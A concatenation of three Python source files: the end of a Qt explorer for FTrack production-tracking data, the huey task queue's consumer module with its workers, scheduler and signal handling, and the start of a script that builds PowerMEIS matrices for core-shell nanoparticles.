model.removeRow(0, index)
# Populate with entities
parentType = model.data(index, self.EntityTypeRole)
parentPrimaryKeys = model.data(index, self.EntityPrimaryKeyRole).split(';')
childKey = model.data(index, self.EntityKeyRole)
self.loadEntity(parentType, parentPrimaryKeys, key=childKey, parent=item)
@QtCore.Slot()
def autoResizeColumns(self):
"""Resize the columns to fit the contents.
This can only be called outside of a thread, otherwise this appears:
QBasicTimer::start: QBasicTimer can only be used with threads started with QThread
"""
self._entityData.resizeColumnToContents(0)
self._entityData.setColumnWidth(1, self._entityData.columnWidth(0))
self._entityData.resizeColumnToContents(2)
try:
self.topLevelEntityAdded.disconnect(self.autoResizeColumns)
except RuntimeError:
pass
def checkCredentials(self):
"""Ensure required environment variables are set."""
def createPopup(key, input_type, default_value):
if key in os.environ:
return False
text = os.environ.get(key, default_value)
value, valid = QtWidgets.QInputDialog.getText(
self, f'{input_type[0].upper()+input_type[1:]} required',
f'Enter FTrack {input_type}:', text=text,
)
if not valid:
return False
os.environ[key] = value
return True
createPopup('FTRACK_SERVER', 'server address', self._ftrack_server)
createPopup('FTRACK_API_KEY', 'API Key', self._ftrack_api_key)
createPopup('FTRACK_API_USER', 'username', self._ftrack_api_user)
@deferred
@errorHandler
def loadEntity(self, entityType, entityID, key=None, parent=None, _loaded=None):
"""Wrap the load function to allow multiple entities to be added."""
session = None
# Only start a session if not loading cached data
if self.autoPopulate():
session = ftrack_api.Session()
# Build a list of potential entities
if entityID:
entity = session.get(entityType, entityID)
if entity is None:
print(f'Could not find entity.')
entities = []
else:
entities = [entityID]
else:
entities = session.query(entityType)
# Load anything not yet loaded
for i, entity in enumerate(entities):
if not isinstance(entity, ftrack_api.entity.base.Entity):
entities[i] = session.get(entityType, entityID)
# Load entity from cache
else:
name = entityRepr(EntityCache.types()[entityType], entityID, remapIDs=self.remapIDs())
entity = EntityCache.entity(name)
if entity is not None:
entities = [entity]
# Add each entity to the GUI
for entity in entities:
try:
self._loadEntity(entity, key=key, parent=parent, _loaded=_loaded)
# The GUI has likely refreshed so we can stop the query here
except RuntimeError:
break
if session is not None:
session.close()
def _loadEntity(self, entity, key=None, parent=None, _loaded=None):
"""Add a new FTrack entity.
Optionally set key to load a child entity.
"""
if _loaded is None:
_loaded = []
else:
_loaded = list(sorted(_loaded))
cache = EntityCache(entity, remapIDs=self.remapIDs())
name = cache.id
attributes = type(entity).attributes
# Add a new top level item
if parent is None:
root = self._entityData.model().invisibleRootItem()
parent = self.addItem(root, None, entity, entity)
self.topLevelEntityAdded.emit()
print(f'Found {name}')
EntityCache.load(entity, remapIDs=self.remapIDs())
# Stop here as we don't want to force load everything
return
if key:
print(f'Loading data for {key!r}...')
else:
print(f'Loading data for {name}...')
# Allow individual keys to be loaded
if key:
self.entityLoading.emit(f'{name}[{key!r}]', 0)
attr = attributes.get(key)
# Load entities
if isinstance(attr, ftrack_api.attribute.ReferenceAttribute):
entity = entity[key]
# Load collections
else:
value = entity[key]
total_values = len(value)
if isinstance(attr, ftrack_api.attribute.CollectionAttribute):
for i, v in enumerate(value):
self.entityLoading.emit(f'{name}[{key!r}]', int(100 * i / total_values))
self.addItem(parent, None, v, v)
elif isinstance(attr, ftrack_api.attribute.KeyValueMappedCollectionAttribute):
for i, (k, v) in enumerate(sorted(value.items())):
self.entityLoading.emit(f'{name}[{key!r}]', int(100 * i / total_values))
self.addItem(parent, k, v, v)
self.entityLoading.emit(f'{name}[{key!r}]', 100)
print(f'Finished loading {key!r} collection')
return
# Load all keys
keys = set(entity.keys())
# Load a new entity
total_keys = len(keys)
for i, key in enumerate(sorted(keys)):
self.entityLoading.emit(name, int(100 * i / total_keys))
if key in _loaded:
continue
# Load cached value
if key in cache:
value = cache[key]
print(f'Read {key!r} from cache...')
# Fetch from server
elif self.autoPopulate():
print(f'Reading {key!r}...')
# Avoid loading non scalar types at this stage
attr = attributes.get(key)
if isinstance(attr, ftrack_api.attribute.CollectionAttribute):
value = Placeholders.Collection()
elif isinstance(attr, ftrack_api.attribute.KeyValueMappedCollectionAttribute):
value = Placeholders.KeyValueMappedCollectionProxy()
else:
try:
value = entity[key]
except ftrack_api.exception.ServerError:
print(f'Failed to read {key!r}')
continue
else:
cache[key] = value
else:
continue
# Insert in alphabetical order
row = None
if _loaded:
for i, k in enumerate(_loaded):
if k > key:
row = i
_loaded.insert(i, key)
break
self.addItem(parent, key, value, entity, row=row)
self.entityLoading.emit(name, 100)
print(f'Finished reading data from {name}')
def appendRow(self, parent, entityKey, entityValue='', entityType='', row=None):
"""Create a new row of QStandardItems."""
if self.remapIDs():
entityValue = remapID(entityValue)
item = QtGui.QStandardItem(entityKey)
data = (item, QtGui.QStandardItem(entityValue), QtGui.QStandardItem(entityType))
if row is None:
parent.appendRow(data)
else:
parent.insertRow(row, data)
return item
def addItem(self, parent, key, value, entity, row=None):
"""Add an FTrack entity value.
Parameters:
parent (QStandardItem): Parent item to append to.
key (str): The key used to access the current entity.
value (object): Value belonging to entity['key'].
entity (Entity): Parent entity.
This is used with the dummy items so that the child
entity can easily be queried later.
"""
className = type(value).__name__
if isinstance(value, (list, tuple)):
child = self.appendRow(parent, key, '', className, row=row)
for i, v in enumerate(value):
k = str(i)
self.addItem(child, k, v, entity)
elif isinstance(value, dict):
child = self.appendRow(parent, key, '', className, row=row)
for k, v in sorted(value.items()):
self.addItem(child, k, v, entity)
elif isinstance(value, ftrack_api.entity.base.Entity):
entityStr = entityRepr(value, remapIDs=self.remapIDs())
if key is None:
key, entityStr = entityStr, ''
child = self.appendRow(parent, key, entityStr, type(value).entity_type, row=row)
self.addDummyItem(child, value, '')
elif isinstance(value, (ftrack_api.collection.Collection, Placeholders.Collection)):
child = self.appendRow(parent, key, '', className, row=row)
self.addDummyItem(child, entity, key)
elif isinstance(value, (ftrack_api.collection.KeyValueMappedCollectionProxy,
Placeholders.KeyValueMappedCollectionProxy)):
child = self.appendRow(parent, key, '', className, row=row)
self.addDummyItem(child, entity, key)
else:
child = self.appendRow(parent, key, str(value), className, row=row)
return child
def addDummyItem(self, parent, entity, key):
"""Create a dummy item for things not yet loaded."""
model = self._entityData.model()
# Store data about the parent entities
primary_key_attributes = type(entity).primary_key_attributes
parentIndex = model.indexFromItem(parent)
model.setData(parentIndex, True, self.DummyRole)
model.setData(parentIndex, str(key), self.EntityKeyRole)
model.setData(parentIndex, str(entity.__class__.__name__), self.EntityTypeRole)
model.setData(parentIndex, ';'.join(str(entity[k]) for k in map(str, primary_key_attributes)), self.EntityPrimaryKeyRole)
# Create the dummy item
item = QtGui.QStandardItem('<not loaded>')
parent.appendRow(item)
return item
if __name__ == '__main__':
FTrackExplorer.show()
|
consumer.py
|
import datetime
import logging
import os
import signal
import sys
import threading
import time
from multiprocessing import Event as ProcessEvent
from multiprocessing import Process
try:
import gevent
from gevent import Greenlet
from gevent.event import Event as GreenEvent
except ImportError:
Greenlet = GreenEvent = None
from huey.constants import WORKER_GREENLET
from huey.constants import WORKER_PROCESS
from huey.constants import WORKER_THREAD
from huey.constants import WORKER_TYPES
from huey.exceptions import CancelExecution
from huey.exceptions import ConfigurationError
from huey.exceptions import DataStoreGetException
from huey.exceptions import QueueException
from huey.exceptions import QueueReadException
from huey.exceptions import DataStorePutException
from huey.exceptions import QueueWriteException
from huey.exceptions import RetryTask
from huey.exceptions import ScheduleAddException
from huey.exceptions import ScheduleReadException
from huey.exceptions import TaskLockedException
EVENT_CHECKING_PERIODIC = 'checking-periodic'
EVENT_ERROR_DEQUEUEING = 'error-dequeueing'
EVENT_ERROR_ENQUEUEING = 'error-enqueueing'
EVENT_ERROR_INTERNAL = 'error-internal'
EVENT_ERROR_SCHEDULING = 'error-scheduling'
EVENT_ERROR_STORING_RESULT = 'error-storing-result'
EVENT_ERROR_TASK = 'error-task'
EVENT_LOCKED = 'locked'
EVENT_FINISHED = 'finished'
EVENT_RETRYING = 'retrying'
EVENT_REVOKED = 'revoked'
EVENT_SCHEDULED = 'scheduled'
EVENT_SCHEDULING_PERIODIC = 'scheduling-periodic'
EVENT_STARTED = 'started'
EVENT_TIMEOUT = 'timeout'
def to_timestamp(dt):
if dt:
return time.mktime(dt.timetuple())
class BaseProcess(object):
"""
Abstract process run by the consumer. Provides convenience methods for
things like sleeping for a given amount of time and enqueueing tasks.
Subclasses should implement the `loop()` method, which is called repeatedly
    until the consumer is shut down. The `loop()` method's return value is
ignored, but an unhandled exception will lead to the process shutting down.
A typical pattern might be::
class CustomProcess(BaseProcess):
def loop(self, now=None):
# Get the current timestamp.
current_ts = time.time()
# Perform some action, which may take an arbitrary amount of
# time.
do_some_action()
# Sleep for 60 seconds, with respect to current_ts, so that
# the whole loop() method repeats every ~60s.
self.sleep_for_interval(current_ts, 60)
You will want to ensure that the consumer starts your custom process::
class MyConsumer(Consumer):
def start(self):
# Initialize workers, scheduler, signal handlers, etc.
super(MyConsumer, self).start()
# Create custom process and start it.
custom_impl = CustomProcess(huey=self.huey, utc=self.utc)
self._custom_proc = self._create_process(custom_impl, 'Custom')
self._custom_proc.start()
See also: Consumer._create_process().
"""
def __init__(self, huey, utc):
self.huey = huey
self.utc = utc
def initialize(self):
pass
def get_now(self):
if self.utc:
return datetime.datetime.utcnow()
return datetime.datetime.now()
def get_utcnow(self):
return datetime.datetime.utcnow()
def get_timestamp(self):
return time.mktime(self.get_utcnow().timetuple())
def sleep_for_interval(self, start_ts, nseconds):
"""
Sleep for a given interval with respect to the start timestamp.
So, if the start timestamp is 1337 and nseconds is 10, the method will
actually sleep for nseconds - (current_timestamp - start_timestamp). So
if the current timestamp is 1340, we'll only sleep for 7 seconds (the
goal being to sleep until 1347, or 1337 + 10).
"""
sleep_time = nseconds - (time.time() - start_ts)
if sleep_time <= 0:
return
self._logger.debug('Sleeping for %s', sleep_time)
# Recompute time to sleep to improve accuracy in case the process was
# pre-empted by the kernel while logging.
sleep_time = nseconds - (time.time() - start_ts)
if sleep_time > 0:
time.sleep(sleep_time)
def enqueue(self, task):
"""
Convenience method for enqueueing a task.
"""
try:
self.huey.enqueue(task)
except QueueWriteException:
self.huey.emit_task(EVENT_ERROR_ENQUEUEING, task, error=True)
self._logger.exception('Error enqueueing task: %s', task)
else:
self._logger.debug('Enqueued task: %s', task)
def loop(self, now=None):
"""
Process-specific implementation. Called repeatedly for as long as the
consumer is running. The `now` parameter is currently only used in the
unit-tests (to avoid monkey-patching datetime / time). Return value is
ignored, but an unhandled exception will lead to the process exiting.
"""
raise NotImplementedError
class Worker(BaseProcess):
"""
Worker implementation.
Will pull tasks from the queue, executing them or adding them to the
schedule if they are set to run in the future.
"""
def __init__(self, huey, default_delay, max_delay, backoff, utc):
self.delay = self.default_delay = default_delay
self.max_delay = max_delay
self.backoff = backoff
self._logger = logging.getLogger('huey.consumer.Worker')
self._pre_execute = huey.pre_execute_hooks.items()
self._post_execute = huey.post_execute_hooks.items()
super(Worker, self).__init__(huey, utc)
def initialize(self):
for name, startup_hook in self.huey.startup_hooks.items():
self._logger.debug('calling startup hook "%s"', name)
try:
startup_hook()
except Exception as exc:
self._logger.exception('startup hook "%s" failed', name)
def loop(self, now=None):
task = None
exc_raised = True
try:
task = self.huey.dequeue()
except QueueReadException:
self.huey.emit_status(EVENT_ERROR_DEQUEUEING, error=True)
self._logger.exception('Error reading from queue')
except QueueException:
self.huey.emit_status(EVENT_ERROR_INTERNAL, error=True)
self._logger.exception('Queue exception')
except KeyboardInterrupt:
raise
except:
self.huey.emit_status(EVENT_ERROR_DEQUEUEING, error=True)
self._logger.exception('Unknown exception dequeueing task.')
else:
exc_raised = False
if task:
self.delay = self.default_delay
self.handle_task(task, now or self.get_now())
elif exc_raised or not self.huey.blocking:
self.sleep()
def sleep(self):
if self.delay > self.max_delay:
self.delay = self.max_delay
self._logger.debug('No messages, sleeping for: %s', self.delay)
time.sleep(self.delay)
self.delay *= self.backoff
def handle_task(self, task, ts):
"""
Handle a task that was just read from the queue. There are three
possible outcomes:
1. Task is scheduled for the future, add to the schedule.
2. Task is ready to run, but has been revoked. Discard.
3. Task is ready to run and not revoked. Execute task.
"""
if not self.huey.ready_to_run(task, ts):
self.add_schedule(task)
elif not self.is_revoked(task, ts):
self.process_task(task, ts)
else:
self.huey.emit_task(
EVENT_REVOKED,
task,
timestamp=to_timestamp(ts))
self._logger.debug('Task %s was revoked, not running', task)
def process_task(self, task, ts):
"""
Execute a task and (optionally) store the return value in result store.
Unhandled exceptions are caught and logged.
"""
self.huey.emit_task(EVENT_STARTED, task, timestamp=to_timestamp(ts))
if self._pre_execute:
try:
self.run_pre_execute_hooks(task)
except CancelExecution:
return
self._logger.info('Executing %s', task)
start = time.time()
exception = None
task_value = None
try:
try:
task_value = self.huey.execute(task)
finally:
duration = time.time() - start
self._logger.debug('Task %s ran in %0.3fs', task, duration)
except DataStorePutException:
self._logger.exception('Error storing result')
self.huey.emit_task(
EVENT_ERROR_STORING_RESULT,
task,
error=True,
duration=duration)
except TaskLockedException as exc:
self._logger.warning('Task %s could not run, unable to obtain '
'lock.', task.task_id)
self.huey.emit_task(
EVENT_LOCKED,
task,
error=False,
duration=duration)
exception = exc
except RetryTask:
if not task.retries:
self._logger.error('Cannot retry task %s - no retries '
'remaining.', task.task_id)
exception = True
except KeyboardInterrupt:
self._logger.info('Received exit signal, task %s did not finish.',
task.task_id)
return
except Exception as exc:
self._logger.exception('Unhandled exception in worker thread')
self.huey.emit_task(
EVENT_ERROR_TASK,
task,
error=True,
duration=duration)
exception = exc
else:
self.huey.emit_task(
EVENT_FINISHED,
task,
duration=duration,
timestamp=self.get_timestamp())
if self._post_execute:
self.run_post_execute_hooks(task, task_value, exception)
if exception is not None and task.retries:
self.requeue_task(task, self.get_now())
def run_pre_execute_hooks(self, task):
self._logger.info('Running pre-execute hooks for %s', task)
for name, callback in self._pre_execute:
self._logger.debug('Executing %s pre-execute hook.', name)
try:
callback(task)
except CancelExecution:
self._logger.info('Execution of %s cancelled by %s.', task,
name)
raise
except Exception:
self._logger.exception('Unhandled exception calling pre-'
'execute hook %s for %s.', name, task)
def run_post_execute_hooks(self, task, task_value, exception):
self._logger.info('Running post-execute hooks for %s', task)
for name, callback in self._post_execute:
self._logger.debug('Executing %s post-execute hook.', name)
try:
callback(task, task_value, exception)
except Exception as exc:
self._logger.exception('Unhandled exception calling post-'
'execute hook %s for %s.', name, task)
def requeue_task(self, task, ts):
task.retries -= 1
self.huey.emit_task(EVENT_RETRYING, task)
self._logger.info('Re-enqueueing task %s, %s tries left',
task.task_id, task.retries)
if task.retry_delay:
delay = datetime.timedelta(seconds=task.retry_delay)
task.execute_time = ts + delay
self.add_schedule(task)
else:
self.enqueue(task)
def add_schedule(self, task):
self._logger.info('Adding %s to schedule', task)
try:
self.huey.add_schedule(task)
except ScheduleAddException:
self.huey.emit_task(EVENT_ERROR_SCHEDULING, task, error=True)
self._logger.error('Error adding task to schedule: %s', task)
else:
self.huey.emit_task(EVENT_SCHEDULED, task)
def is_revoked(self, task, ts):
try:
if self.huey.is_revoked(task, ts, peek=False):
return True
return False
except DataStoreGetException:
self.huey.emit_task(EVENT_ERROR_INTERNAL, task, error=True)
self._logger.error('Error checking if task is revoked: %s', task)
return True
class Scheduler(BaseProcess):
"""
Scheduler handles enqueueing tasks when they are scheduled to execute. Note
that the scheduler does not actually execute any tasks, but simply enqueues
them so that they can be picked up by the worker processes.
If periodic tasks are enabled, the scheduler will wake up every 60 seconds
to enqueue any periodic tasks that should be run.
"""
def __init__(self, huey, interval, utc, periodic):
super(Scheduler, self).__init__(huey, utc)
self.interval = min(interval, 60)
self.periodic = periodic
if periodic:
# Determine the periodic task interval.
self._counter = 0
self._q, self._r = divmod(60, self.interval)
self._cr = self._r
self._logger = logging.getLogger('huey.consumer.Scheduler')
self._next_loop = time.time()
def loop(self, now=None):
current = self._next_loop
self._next_loop += self.interval
if self._next_loop < time.time():
self._logger.info('scheduler skipping iteration to avoid race.')
return
try:
task_list = self.huey.read_schedule(now or self.get_now())
except ScheduleReadException:
#self.huey.emit_task(EVENT_ERROR_SCHEDULING, task, error=True)
self._logger.exception('Error reading from task schedule.')
else:
for task in task_list:
self._logger.info('Scheduling %s for execution', task)
self.enqueue(task)
if self.periodic:
# The scheduler has an interesting property of being able to run at
# intervals that are not factors of 60. Suppose we ask our
# scheduler to run every 45 seconds. We still want to schedule
# periodic tasks once per minute, however. So we use a running
# remainder to ensure that no matter what interval the scheduler is
# running at, we still are enqueueing tasks once per minute at the
# same time.
if self._counter >= self._q:
self._counter = 0
if self._cr:
self.sleep_for_interval(current, self._cr)
if self._r:
self._cr += self._r
if self._cr >= self.interval:
self._cr -= self.interval
self._counter -= 1
self.enqueue_periodic_tasks(now or self.get_now(), current)
self._counter += 1
self.sleep_for_interval(current, self.interval)
def enqueue_periodic_tasks(self, now, start):
self.huey.emit_status(
EVENT_CHECKING_PERIODIC,
timestamp=self.get_timestamp())
self._logger.debug('Checking periodic tasks')
for task in self.huey.read_periodic(now):
self.huey.emit_task(
EVENT_SCHEDULING_PERIODIC,
task,
timestamp=self.get_timestamp())
self._logger.info('Scheduling periodic task %s.', task)
self.enqueue(task)
return True
class Environment(object):
"""
Provide a common interface to the supported concurrent environments.
"""
def get_stop_flag(self):
raise NotImplementedError
def create_process(self, runnable, name):
raise NotImplementedError
def is_alive(self, proc):
raise NotImplementedError
class ThreadEnvironment(Environment):
def get_stop_flag(self):
return threading.Event()
def create_process(self, runnable, name):
t = threading.Thread(target=runnable, name=name)
t.daemon = True
return t
def is_alive(self, proc):
        return proc.is_alive()
class GreenletEnvironment(Environment):
def get_stop_flag(self):
return GreenEvent()
def create_process(self, runnable, name):
def run_wrapper():
gevent.sleep()
runnable()
gevent.sleep()
return Greenlet(run=run_wrapper)
def is_alive(self, proc):
return not proc.dead
class ProcessEnvironment(Environment):
def get_stop_flag(self):
return ProcessEvent()
def create_process(self, runnable, name):
p = Process(target=runnable, name=name)
p.daemon = True
return p
def is_alive(self, proc):
return proc.is_alive()
WORKER_TO_ENVIRONMENT = {
WORKER_THREAD: ThreadEnvironment,
WORKER_GREENLET: GreenletEnvironment,
'gevent': GreenletEnvironment, # Preserved for backwards-compat.
WORKER_PROCESS: ProcessEnvironment,
}
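# Illustrative sketch (not part of the original module): how a worker_type string
# selects one of the environments above, and how the consumer-style helpers are
# used to spawn a runnable.
def _example_environment():
    env = WORKER_TO_ENVIRONMENT[WORKER_THREAD]()          # -> ThreadEnvironment
    stop_flag = env.get_stop_flag()                       # threading.Event instance
    proc = env.create_process(lambda: None, 'Worker-1')   # daemon thread, not started
    proc.start()
    return env, stop_flag, proc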
class Consumer(object):
"""
Consumer sets up and coordinates the execution of the workers and scheduler
and registers signal handlers.
"""
def __init__(self, huey, workers=1, periodic=True, initial_delay=0.1,
backoff=1.15, max_delay=10.0, utc=True, scheduler_interval=1,
worker_type='thread', check_worker_health=True,
health_check_interval=1, flush_locks=False):
self._logger = logging.getLogger('huey.consumer')
if huey.always_eager:
self._logger.warning('Consumer initialized with Huey instance '
'that has "always_eager" mode enabled. This '
'must be disabled before the consumer can '
'be run.')
self.huey = huey
self.workers = workers # Number of workers.
self.periodic = periodic # Enable periodic task scheduler?
self.default_delay = initial_delay # Default queue polling interval.
self.backoff = backoff # Exponential backoff factor when queue empty.
self.max_delay = max_delay # Maximum interval between polling events.
self.utc = utc # Timestamps are considered UTC.
# Ensure that the scheduler runs at an interval between 1 and 60s.
self.scheduler_interval = max(min(scheduler_interval, 60), 1)
self.worker_type = worker_type # What process model are we using?
# Configure health-check and consumer main-loop attributes.
self._stop_flag_timeout = 0.1
self._health_check = check_worker_health
self._health_check_interval = float(health_check_interval)
# Create the execution environment helper.
self.environment = self.get_environment(self.worker_type)
# Create the event used to signal the process should terminate. We'll
# also store a boolean flag to indicate whether we should restart after
# the processes are cleaned up.
self._received_signal = False
self._restart = False
self._graceful = True
self.stop_flag = self.environment.get_stop_flag()
# In the event the consumer was killed while running a task that held
# a lock, this ensures that all locks are flushed before starting.
if flush_locks:
self.flush_locks()
# Create the scheduler process (but don't start it yet).
scheduler = self._create_scheduler()
self.scheduler = self._create_process(scheduler, 'Scheduler')
# Create the worker process(es) (also not started yet).
self.worker_threads = []
for i in range(workers):
worker = self._create_worker()
process = self._create_process(worker, 'Worker-%d' % (i + 1))
# The worker threads are stored as [(worker impl, worker_t), ...].
# The worker impl is not currently referenced in any consumer code,
# but it is referenced in the test-suite.
self.worker_threads.append((worker, process))
def flush_locks(self):
self._logger.debug('Flushing locks before starting up.')
flushed = self.huey.flush_locks()
if flushed:
self._logger.warning('Found stale locks: %s' % (
', '.join(key for key in flushed)))
def get_environment(self, worker_type):
if worker_type not in WORKER_TO_ENVIRONMENT:
raise ValueError('worker_type must be one of %s.' %
', '.join(WORKER_TYPES))
return WORKER_TO_ENVIRONMENT[worker_type]()
def _create_worker(self):
return Worker(
huey=self.huey,
default_delay=self.default_delay,
max_delay=self.max_delay,
backoff=self.backoff,
utc=self.utc)
def _create_scheduler(self):
return Scheduler(
huey=self.huey,
interval=self.scheduler_interval,
utc=self.utc,
periodic=self.periodic)
def _create_process(self, process, name):
"""
Repeatedly call the `loop()` method of the given process. Unhandled
exceptions in the `loop()` method will cause the process to terminate.
"""
def _run():
process.initialize()
try:
while not self.stop_flag.is_set():
process.loop()
except KeyboardInterrupt:
pass
except:
self._logger.exception('Process %s died!', name)
return self.environment.create_process(_run, name)
def start(self):
"""
Start all consumer processes and register signal handlers.
"""
if self.huey.always_eager:
raise ConfigurationError(
'Consumer cannot be run with Huey instances where always_eager'
' is enabled. Please check your configuration and ensure that'
' "huey.always_eager = False".')
# Log startup message.
self._logger.info('Huey consumer started with %s %s, PID %s',
self.workers, self.worker_type, os.getpid())
self._logger.info('Scheduler runs every %s second(s).',
self.scheduler_interval)
self._logger.info('Periodic tasks are %s.',
'enabled' if self.periodic else 'disabled')
self._logger.info('UTC is %s.', 'enabled' if self.utc else 'disabled')
self._set_signal_handlers()
msg = ['The following commands are available:']
for command in self.huey.registry._registry:
msg.append('+ %s' % command.replace('queuecmd_', ''))
self._logger.info('\n'.join(msg))
# We'll temporarily ignore SIGINT and SIGHUP (so that the ignore
# disposition is inherited by the child processes). Once the child
# processes are created, we restore the original handlers.
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
if hasattr(signal, 'SIGHUP'):
original_sighup_handler = signal.signal(signal.SIGHUP, signal.SIG_IGN)
self.scheduler.start()
for _, worker_process in self.worker_threads:
worker_process.start()
signal.signal(signal.SIGINT, original_sigint_handler)
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, original_sighup_handler)
def stop(self, graceful=False):
"""
Set the stop-flag.
If `graceful=True`, this method blocks until the workers finish
executing any tasks they are currently working on.
"""
self.stop_flag.set()
if graceful:
self._logger.info('Shutting down gracefully...')
try:
for _, worker_process in self.worker_threads:
worker_process.join()
except KeyboardInterrupt:
self._logger.info('Received request to shut down now.')
else:
self._logger.info('All workers have stopped.')
else:
self._logger.info('Shutting down')
def run(self):
"""
Run the consumer.
"""
self.start()
timeout = self._stop_flag_timeout
health_check_ts = time.time()
while True:
try:
self.stop_flag.wait(timeout=timeout)
except KeyboardInterrupt:
self._logger.info('Received SIGINT')
self.stop(graceful=True)
except:
self._logger.exception('Error in consumer.')
self.stop()
else:
if self._received_signal:
self.stop(graceful=self._graceful)
if self.stop_flag.is_set():
break
if self._health_check:
now = time.time()
if now >= health_check_ts + self._health_check_interval:
health_check_ts = now
self.check_worker_health()
if self._restart:
self._logger.info('Consumer will restart.')
python = sys.executable
os.execl(python, python, *sys.argv)
else:
self._logger.info('Consumer exiting.')
def check_worker_health(self):
"""
Check the health of the worker processes. Workers that have died will
be replaced with new workers.
"""
self._logger.debug('Checking worker health.')
workers = []
restart_occurred = False
for i, (worker, worker_t) in enumerate(self.worker_threads):
if not self.environment.is_alive(worker_t):
self._logger.warning('Worker %d died, restarting.', i + 1)
worker = self._create_worker()
worker_t = self._create_process(worker, 'Worker-%d' % (i + 1))
worker_t.start()
restart_occurred = True
workers.append((worker, worker_t))
if restart_occurred:
self.worker_threads = workers
else:
self._logger.debug('Workers are up and running.')
if not self.environment.is_alive(self.scheduler):
self._logger.warning('Scheduler died, restarting.')
scheduler = self._create_scheduler()
self.scheduler = self._create_process(scheduler, 'Scheduler')
self.scheduler.start()
else:
self._logger.debug('Scheduler is up and running.')
return not restart_occurred
def _set_signal_handlers(self):
signal.signal(signal.SIGTERM, self._handle_stop_signal)
signal.signal(signal.SIGINT, signal.default_int_handler)
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, self._handle_restart_signal)
def _handle_stop_signal(self, sig_num, frame):
self._logger.info('Received SIGTERM')
self._received_signal = True
self._restart = False
self._graceful = False
def _handle_restart_signal(self, sig_num, frame):
self._logger.info('Received SIGHUP, will restart')
self._received_signal = True
self._restart = True
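# --- Usage sketch (added; not part of the original module) ---
# A minimal illustration of how the pieces above fit together; in practice
# the bundled `huey_consumer` entry point builds the Consumer from
# command-line options. It assumes an existing Huey instance, e.g.:
#
#   from huey import RedisHuey
#   huey = RedisHuey('demo')
#   consumer = Consumer(huey, workers=4, worker_type=WORKER_THREAD,
#                       scheduler_interval=1, periodic=True)
#   consumer.run()   # blocks; SIGTERM stops it, SIGHUP restarts it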
|
thirdparallel_powermeismatrix_general.py
|
### Here we show how to build the program that constructs the matrices in a general way, given the stacking geometries that were studied.
# -*- coding: utf-8 -*-
import numpy
import threading
import math
import multiprocessing
from numpy import matrix,sqrt
from multiprocessing.pool import ThreadPool
from multiprocessing import Pool
from joblib import Parallel, delayed
from functools import partial
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
# here the ordering of the elements in the nanoparticle is chosen
## this has to be revised to agree with the PowerMEIS program
def estruturas(alloytudo,cascaptpd,core,cs,dl):
cnum=4.0
if (alloytudo=='s' ):
radiuspt=(float(input('PtPd core size ')))
radiuspd=radiuspt
radiusc=radiuspt+cs
radiuscore=radiuspt
radiusshell=radiuspt
corenumber= 3
shellnumber=3
# print (radiusc,radiusshell,radiuscore)
if(alloytudo == 'n'):
if(cascaptpd=='s' and core=='pt'):
radiuspt=float(input('Pt core size '))
radiuspd=float(input('PtPd shell size '))
radiusc=radiuspt+cs
radiuscore=radiuspt
radiusshell=radiuspd
corenumber=1
shellnumber=3.0
if(cascaptpd=='s' and core=='pd'):
radiuspd=float(input('Pd core size '))
radiuspt=float(input('PtPd shell size '))
radiusc=radiuspt+cs
radiuscore=radiuspd
radiusshell=radiuspt
corenumber=2
shellnumber=3.0
if(cascaptpd=='n'):
core=input('Core made of pd or pt? ')  # keep it a string: it is compared with 'pd'/'pt' below
if(core=='pd'):
radiuspd=float(input('Pd core size '))
radiuspt= float(input('Pt shell size '))
radiusc=radiuspt+cs
radiuscore=radiuspd
radiusshell=radiuspt
corenumber=2
shellnumber=1
if(core=='pt'):
radiuspt=float(input('Pt core size '))
radiuspd=float(input('Pd shell size '))
radiusc=radiuspd+cs
radiuscore=radiuspt
radiusshell=radiuspd
corenumber=1
shellnumber=2
# if(alloytudo == 'n' and cascaptpd == 'n' and (core =='pd' or core == 'pt')):
# return [radiusc, radiuscore, radiusshell, corenumber, shellnumber, radiuspt, radiuspd,cnum]
# if(alloytudo =='s'):
return [radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]
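# Illustrative note (inferred from the branches above, so treat as an
# assumption): the indices written into the matrix appear to encode the
# materials as 1=Pt, 2=Pd, 3=PtPd alloy and cnum=4=carbon/surfactant shell;
# these must match the element ordering expected by the PowerMEIS input.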
###########################################################################################################################
# define a function that determines whether the position x,y,z is inside the core-shell
# this function is to generate spherical nanoparticles
def incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z):
div=float(radiusc/dl)
# x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
# y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiy))*div-j)+2))
# z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
# print (x[ii])
# print(corenumber)
aa=0
# core
if ( ((x[ii]/(div))**2+(y[ii]/(div))**2+(z[ii]/(div))**2) <= (((float(radiuscore))/(float(radiusc)))**2) ):
# A[a][b]=corenumber
index=corenumber
aa=1
# print(corenumber, "corenum")
# shell
if ( (((x[ii]/(div))**2+(y[ii]/(div))**2+ (z[ii]/(div))**2) >= (((float(radiuscore))/(float(radiusc)))**2)) and (((x[ii]/(div))**2+(y[ii]/(div))**2+ (z[ii]/(div))**2) <= (((float(radiusshell))/(float(radiusc)))**2))):
# A[a][b]=shellnumber
index=shellnumber
aa=1
# carbon shell
if ( (((x[ii]/((div)))**2+(y[ii]/((div)))**2+ (z[ii]/((div)))**2) >= (((float(radiusshell))/(float(radiusc)))**2)) and (((x[ii]/((div)))**2+(y[ii]/((div)))**2+ (z[ii]/((div)))**2) <= ((1.0)**2))):
# A[a][b]=cnum
index=cnum
aa=1
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
return index,aa
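# Worked example (added, illustrative numbers only): with radiusc=10,
# radiuscore=4, radiusshell=7 and dl=1, div=10. A voxel at x=y=z=2 gives
# 3*(2/10)**2 = 0.12 <= (4/10)**2 = 0.16, so it is labelled corenumber;
# x=y=z=4 gives 0.48, between (4/10)**2 and (7/10)**2 = 0.49, so it is
# labelled shellnumber; x=y=z=5 gives 0.75 <= 1.0, so it falls in the outer
# carbon/surfactant shell and is labelled cnum.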
###########################################################################################################################
# define a function that determines whether the position x,y,z is inside the core-shell
